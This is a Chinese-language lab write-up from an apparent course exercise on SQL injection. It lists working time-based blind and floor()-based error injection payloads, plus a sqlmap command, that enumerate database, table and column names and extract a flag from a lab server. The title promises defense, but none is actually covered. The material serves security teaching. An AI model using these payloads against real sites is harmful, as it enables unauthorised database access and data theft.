SQL注入漏洞的攻击与防御

一、实验名称

SQL注入漏洞的攻击与防御

二、实验环境（详细说明运行的系统、平台及代码等）

1、攻击机系统环境：Windows 7/8/10

2、浏览器：Firefox 53.0.2（64位）

3、浏览器插件HackBar 1.6.3.1

4、Burp Suite 1.7.11

三、实验步骤及结果

1、基于时间延迟的盲注

打开Firefox浏览器，按F12，打开FireBug。选择“网络选项卡”

实验网址： http://222.18.158.243:4609/

注入点：http://222.18.158.243:4609/?id=1

需要学生自己构造SQL语句，获得字段个数、字段精确位置、数据库名、数据库用户名、表名、字段名、字段内容等信息。

提示：

http://222.18.158.243:4609/?id=1 and if(length(database())=6,sleep(1),1)%23

FireBug中，“网络选项卡”的时间线与

http://222.18.158.243:4609/?id=1andif(length(database())=5,sleep(1),1)%23

http://222.18.158.243:4609/?id=1andif(length(database())=7,sleep(1),1)%23

有明显区别，可以判断出数据库名长度为6

或者，做一个1，2，3，4。。。。30的密码字典，用Burp Suite爆破，注意，在显示爆破结果页面时，Columns列需要设置勾选“Response received”

Burp Suite使用方法参考：

http://www.360doc.com/content/16/0425/10/29967943_553593234.shtml

可以看到6与其他的明显不同，也可以得到数据库长度为6

2、利用floor()函数进行报错注入

提示“floor报错注入，注入点id=1”

实验网址： http://222.18.158.243:4606/

注入点：http://222.18.158.243:4606/?id=1

需要学生自己构造SQL语句，获得字段个数、字段精确位置、数据库名、数据库用户名、表名、字段名、字段内容等信息。

http://222.18.158.243:4606/?id=1 and(select 1 from(select count(*),concat((select database()),floor(rand(0)*2))x from information_schema.tables group by x)a)

http://222.18.158.243:4606/?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

http://222.18.158.243:4606/?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=flag LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

http://222.18.158.243:4606/?id=1 and(select 1 from(select count(*),concat((select flag from flag),floor(rand(0)*2))x from information_schema.tables group by x)a)

实验心得

通过实验了解基于时间延迟的盲注、利用floor()函数进行报错注入的相关操作

思考题

应该如何使用SQLmap进行本实验中的几个注入？

python sqlmap.py -u "http://222.18.158.243:4610/?id=1" -p "id" --current-db --batch -T "flag" --no-cast --level 5 --risk 2

SQL注入漏洞的攻击与防御相关推荐

mysql延迟注入br,实验3—SQL注入漏洞的攻击与防御（基于时间延迟的盲注）
1.实验名称 SQL报错注入 2.实验环境 1.攻击机系统环境:Windows 7/8/10 2.浏览器:Firefox 53.0.2(64位) 3.浏览器插件HackBar 1.6.3.1 3.实验 ...
web基础漏洞之SQL注入漏洞
先看菜鸟教程中HTTP的知识,HTTP是为了保证客户端与服务器之间的通信.HTTP的请求方法有两种:GET和POST.GET是从服务器上获得数据,POST是向服务器传递数据. Web 程序三层架构: ...
sql注入漏洞，应屏蔽SQL注入攻击
2019独角兽企业重金招聘Python工程师标准>>> 注:SQL注入好比是前端URL传参数请求时参数以SQL 做为参数传入,如 select 1 from dual where ...
[网络安全提高篇] 一〇四.网络渗透靶场Oracle+phpStudy本地搭建万字详解（SQL注入、XSS攻击、文件上传漏洞）
当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...
SQL 注入漏洞（十四）xff 注入攻击
一.xff 注入攻击 X-Forwarded-For 简称 XFF 头,它代表了客户端的真实 IP,通过修改他的值就可以伪造客户端 IP.XFF 并不受 gpc 影响,而且开发人员很容易忽略这个 X ...
php post防止hash攻击,MyBB editpost.php脚本'posthash' 参数SQL注入漏洞
发布日期:2012-12-14 更新日期:2012-12-18 受影响系统: MyBB MyBB 1.x 描述: ------------------------------------------- ...
WEB安全：XSS漏洞与SQL注入漏洞介绍及解决方案
对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...
解决SQL注入与XSS攻击
最近接手之前同事的几个项目,公司利用扫描工具进行全项目扫描,发现了部分项目代码存在安全漏洞,所以需要进行项目代码修复以避免有人恶意攻击.这个任务自然而然的就落到我手上.在这里记录一下操作的过程. 扫描 ...
SQL注入漏洞入门（操作实现）
一 Sql-Inject的概述 SQL注入(SQLi)是一种注入攻击,,可以执行恶意SQL语句.它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器.攻击者可以使 ...

SQL注入漏洞的攻击与防御

SQL注入漏洞的攻击与防御相关推荐

最新文章

热门文章